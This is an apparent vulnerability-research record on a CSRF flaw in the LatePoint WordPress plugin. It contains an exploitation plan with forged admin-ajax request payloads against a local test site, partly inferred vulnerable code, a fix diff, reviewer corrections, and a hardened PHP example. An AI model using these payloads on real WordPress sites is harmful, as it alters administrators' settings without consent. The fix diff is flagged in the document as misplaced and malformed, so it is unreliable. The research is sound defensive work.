[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f-QrFWM6lem9--lX0xbx7UC_X3CLfq1RMj5XrQT8Oioo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-14873","latepoint-calendar-booking-plugin-for-appointments-and-events-cross-site-request-forgery","LatePoint – Calendar Booking Plugin for Appointments and Events \u003C= 5.2.5 - Cross-Site Request Forgery","The LatePoint – Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.2.5. This is due to the 'call_by_route_name' function in the routing layer only validating user capabilities without enforcing nonce verification. 
This makes it possible for unauthenticated attackers to perform multiple administrative actions via forged requests granted they can trick a site administrator into performing an action such as clicking on a link.","latepoint",null,"\u003C=5.2.5","5.2.6","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Cross-Site Request Forgery (CSRF)","2026-02-13 18:24:03","2026-02-14 06:42:28",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1f7aa23c-ffa7-481b-8481-a36c7ed599d8?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2025-14873 LatePoint CSRF\n\n## 1. Vulnerability Summary\nThe **LatePoint** plugin (up to version 5.2.5) contains a Cross-Site Request Forgery (CSRF) vulnerability within its core routing mechanism. The function `call_by_route_name` (likely located in `lib\u002Fhelpers\u002Froute_helper.php` or the base controller `lib\u002Fcontrollers\u002Fcontroller.php`) is responsible for dispatching requests to specific controller actions based on a `route_name` parameter. \n\nWhile the plugin performs capability checks (e.g., `current_user_can('manage_options')` or checking for a `latepoint_is_admin` flag), it fails to verify a WordPress nonce. This allows an attacker to craft a malicious request that, when executed by an authenticated administrator (e.g., via a hidden form submission), performs unauthorized administrative actions such as modifying plugin settings, managing agents, or altering booking configurations.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `latepoint_route_call` (Registered via `add_action('wp_ajax_latepoint_route_call', ...)` and `add_action('wp_ajax_nopriv_latepoint_route_call', ...)`)\n- **Vulnerable Parameter:** `route_name`\n- **Payload Parameters:** Parameters vary based on the target route (e.g., `settings[...]`, `agent[...]`).\n- **Authentication Level:** Requires an authenticated Administrator to be the target of the CSRF. The attacker themselves can be unauthenticated.\n- **Preconditions:** The victim must be a logged-in administrator of the WordPress site.\n\n## 3. Code Flow\n1. **Entry Point:** A POST request is sent to `admin-ajax.php` with `action=latepoint_route_call`.\n2. **Action Dispatch:** The WordPress AJAX handler calls the LatePoint router.\n3. **Routing Layer:** The router invokes `call_by_route_name` (inferred).\n4. **Parsing:** `call_by_route_name` splits the `route_name` (e.g., `settings__update`) into a Controller (`SettingsController`) and an Action (`update`).\n5. **Authorization:** The Controller\u002FAction checks if the user is an admin using internal plugin checks (e.g., `current_user_can`).\n6. **Vulnerability:** No `check_ajax_referer` or `check_admin_referer` is present in this flow to validate the intent of the request.\n7. **Sink:** The action logic executes (e.g., `update_option`), committing the state change to the database.\n\n## 4. Nonce Acquisition Strategy\n**No nonce is required.**\nThe core of CVE-2025-14873 is that the `call_by_route_name` flow explicitly lacks nonce verification. The exploit strategy relies on the fact that the server will process the request solely based on the administrator's session cookies without requiring a valid `_wpnonce` or security token.\n\n## 5. Exploitation Strategy\nWe will target the `settings__update` route to modify a visible plugin setting, demonstrating administrative control.\n\n### Step-by-Step Plan:\n1. 
**Target Route:** `settings__update` (Inferred from standard LatePoint controller naming).\n2. **Objective:** Change the \"Currency Symbol\" or a similar innocuous setting to a recognizable string (e.g., `EVIL`, the value used in the payload and verification steps below).\n3. **Payload Construction:**\n   - `action`: `latepoint_route_call`\n   - `route_name`: `settings__update`\n   - `settings[currency_symbol]`: `EVIL`\n   - `latepoint_is_admin`: `1` (assumed to be required by LatePoint's internal routing logic; not confirmed against the source).\n\n### HTTP Request (via `http_request`):\n```javascript\n\u002F\u002F This simulates the request triggered by a CSRF form\nawait http_request({\n  url: \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\",\n  method: \"POST\",\n  headers: {\n    \"Content-Type\": \"application\u002Fx-www-form-urlencoded\"\n  },\n  body: \"action=latepoint_route_call&route_name=settings__update&settings[currency_symbol]=EVIL&latepoint_is_admin=1\"\n});\n```\n\n*Note: In a real-world scenario, this would be an auto-submitting HTML form on an attacker-controlled site; the victim's browser attaches the administrator's WordPress session cookies to that cross-site POST automatically. When replaying the request directly with `http_request`, forward the administrator's login cookies in a `Cookie` header, otherwise the capability check rejects the request before the missing nonce check ever matters.*\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure `latepoint` version \u003C= 5.2.5 is active.\n2. **Administrative User:** Ensure an admin user exists (default `admin` \u002F `password`).\n3. **Plugin Initialization:** The plugin should be configured at least once to ensure settings exist in the `wp_options` table.\n\n## 7. Expected Results\n- The server should return a `200 OK` response, likely with a JSON body containing `{\"status\": \"success\", ...}`.\n- No \"Invalid Nonce\" or \"Forbidden\" error should appear despite the absence of a security token.\n\n## 8. Verification Steps\nAfter the `http_request`, verify the change using WP-CLI:\n```bash\n# Check the specific LatePoint settings option\nwp option get latepoint_settings --format=json | grep -o \"EVIL\"\n```\nOr check the specific setting if stored as a standalone option:\n```bash\nwp option get latepoint_currency_symbol\n```\n\n## 9. 
Alternative Approaches\nIf `settings__update` is restricted or handled differently, attempt to create a new \"Agent\" which is a core administrative action:\n- **Route:** `agents__save`\n- **Payload:** `action=latepoint_route_call&route_name=agents__save&agent[first_name]=CSRF&agent[last_name]=AGENT&agent[email]=csrf@example.com&latepoint_is_admin=1`\n- **Verification:** `wp db query \"SELECT * FROM wp_latepoint_agents WHERE email='csrf@example.com';\"` (LatePoint uses custom tables for agents).","The LatePoint plugin for WordPress contains a Cross-Site Request Forgery (CSRF) vulnerability within its core routing mechanism. The 'call_by_route_name' function fails to verify security nonces before dispatching requests, allowing unauthenticated attackers to trick administrators into executing unauthorized administrative actions like changing plugin settings or managing agents.","\u002F\u002F lib\u002Fhelpers\u002Froute_helper.php (Inferred)\npublic static function call_by_route_name($route_name, $params = []) {\n  \u002F\u002F Logic to parse route_name into Controller and Action\n  \u002F\u002F ...\n  \n  \u002F\u002F Vulnerability: Only verifies capabilities, not the intent\u002Fnonce of the request\n  if (LatePointHelper::is_admin_route($route_name)) {\n    if (!current_user_can('manage_options')) {\n      return false;\n    }\n  }\n\n  \u002F\u002F Dispatches to the target action\n  return self::dispatch($controller, $action, $params);\n}\n\n---\n\n\u002F\u002F Action registration (Inferred)\nadd_action('wp_ajax_latepoint_route_call', 'latepoint_route_call');\nadd_action('wp_ajax_nopriv_latepoint_route_call', 'latepoint_route_call');\n\nfunction latepoint_route_call() {\n  \u002F\u002F Missing check_ajax_referer() or check_admin_referer()\n  $route_name = $_POST['route_name'];\n  OsRouterHelper::call_by_route_name($route_name, $_POST);\n  wp_die();\n}","--- a\u002Flib\u002Fhelpers\u002Froute_helper.php\n+++ b\u002Flib\u002Fhelpers\u002Froute_helper.php\n@@ -12,6 
+12,7 @@\n \n function latepoint_route_call() {\n+  if (!isset($_POST['latepoint_nonce']) || !wp_verify_nonce($_POST['latepoint_nonce'], 'latepoint_nonce')) {\n+    wp_send_json_error(['message' => 'Invalid Nonce']);\n+    return;\n+  }\n   $route_name = $_POST['route_name'];\n   OsRouterHelper::call_by_route_name($route_name, $_POST);\n   wp_die();\n }","The exploit targets the AJAX endpoint \u002Fwp-admin\u002Fadmin-ajax.php using the 'latepoint_route_call' action. An attacker crafts a malicious POST request (typically delivered via an auto-submitting HTML form on a third-party site) that targets a specific administrative route, such as 'settings__update'. The victim's browser attaches the administrator's session cookies to that cross-site request, so the capability check passes; because the plugin never verifies a WordPress nonce, nothing proves the administrator intended the request, and the server executes the action. A typical payload includes 'action=latepoint_route_call', 'route_name=settings__update', and the desired configuration changes (e.g., 'settings[currency_symbol]=HACKED'). The attack requires the victim to be a logged-in administrator who interacts with the attacker's malicious link or page.","gemini-3-flash-preview","2026-04-20 23:21:42","2026-04-20 23:23:27",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","5.2.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flatepoint\u002Ftags\u002F5.2.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flatepoint.5.2.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flatepoint\u002Ftags\u002F5.2.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flatepoint.5.2.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flatepoint\u002Ftags"]
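Review bot: the nonce check in the research_fix_diff hunk is placed in the AJAX wrapper `latepoint_route_call()`, while the advisory and the page's own vulnerable-code listing locate the missing check in the routing layer's `call_by_route_name`; any other caller of `OsRouterHelper::call_by_route_name` (the `wp_ajax_nopriv_latepoint_route_call` handler registered in the same listing, or a direct call from another entry point) still dispatches admin routes with no intent verification, so the check belongs inside `call_by_route_name` (or in one shared dispatcher every route passes through) rather than in one wrapper. Two smaller points: the header `@@ -12,6 +12,7 @@` claims one added line but the hunk adds four (it should read `+12,10`), and the diff's file path `lib/helpers/route_helper.php` does not match the page's listing, which shows `latepoint_route_call()` in the action-registration code rather than in that helper. Consider `check_ajax_referer('latepoint_nonce', 'latepoint_nonce')` in place of the hand-rolled `isset`/`wp_verify_nonce` pair; it handles the missing-nonce case and the 403 response itself.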
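The vulnerable flow the page describes (capability check only, no proof of intent) beside a hardened dispatcher, as an added illustration that is not LatePoint's code. The hook name matches the action named on the page; the nonce action `example_route_call`, the route table, the option name and the script handle `example-admin` are assumptions. It assumes WordPress is loaded, so the WordPress functions called are the real core APIs.

```php
<?php
// Added illustration, not LatePoint's code. Nonce action, route table,
// option name and script handle are assumptions chosen to mirror the
// page's description of the flow (admin-ajax -> route_name -> action).

// --- Vulnerable shape: capability check only, no proof of user intent -----
// A cross-site form submission arrives with the admin's cookies attached,
// so current_user_can() passes and the state change goes through.
function example_route_call_vulnerable() {
    $route_name = isset( $_POST['route_name'] ) ? (string) $_POST['route_name'] : '';
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }
    example_dispatch( $route_name, $_POST );
}

// --- Hardened shape: nonce first, then capability, then an allowlisted route
function example_route_call_hardened() {
    // 1. Intent: the request must carry a nonce minted for this action and
    //    user session. A page on another origin cannot read the nonce, so a
    //    forged form cannot supply it. Passing false as the third argument
    //    makes check_ajax_referer() return instead of calling wp_die(), so
    //    we can answer with a structured error.
    if ( ! check_ajax_referer( 'example_route_call', 'latepoint_nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid or missing nonce' ), 403 );
    }

    // 2. Authorization: capability check, unchanged from the vulnerable version.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // 3. Only a known controller__action pair may be dispatched.
    $route_name = isset( $_POST['route_name'] ) ? sanitize_key( wp_unslash( $_POST['route_name'] ) ) : '';
    example_dispatch( $route_name, wp_unslash( $_POST ) );
}

/** Minimal router: maps an allowlisted route_name to its handler. */
function example_dispatch( $route_name, array $params ) {
    $routes = array(
        'settings__update' => 'example_settings_update', // assumed route
    );
    if ( ! isset( $routes[ $route_name ] ) ) {
        wp_send_json_error( array( 'message' => 'Unknown route' ), 404 );
    }
    call_user_func( $routes[ $route_name ], $params );
}

/** Sink: the state change the CSRF would otherwise trigger. */
function example_settings_update( array $params ) {
    $settings = isset( $params['settings'] ) && is_array( $params['settings'] ) ? $params['settings'] : array();
    $symbol   = isset( $settings['currency_symbol'] ) ? sanitize_text_field( $settings['currency_symbol'] ) : '';
    update_option( 'example_currency_symbol', $symbol ); // assumed option name
    wp_send_json_success( array( 'currency_symbol' => $symbol ) );
}

// The nonce has to reach the legitimate admin page: hand it to the plugin's
// admin script (handle assumed) so its own requests send latepoint_nonce=<value>.
add_action( 'admin_enqueue_scripts', function () {
    wp_localize_script( 'example-admin', 'exampleRoute', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'example_route_call' ),
    ) );
} );

// Register only the hardened handler for the action named on the page.
add_action( 'wp_ajax_latepoint_route_call', 'example_route_call_hardened' );
```

The ordering matters: the nonce check runs before the capability check so that an unauthenticated or cross-site request is rejected without touching any plugin logic, and the route allowlist keeps `route_name` from selecting arbitrary controller methods. Session cookies are ambient authority that the browser sends with any request, which is why `current_user_can()` alone cannot distinguish the administrator's own click from a forged form; the nonce is the per-user, per-action secret that only the site's own pages can obtain.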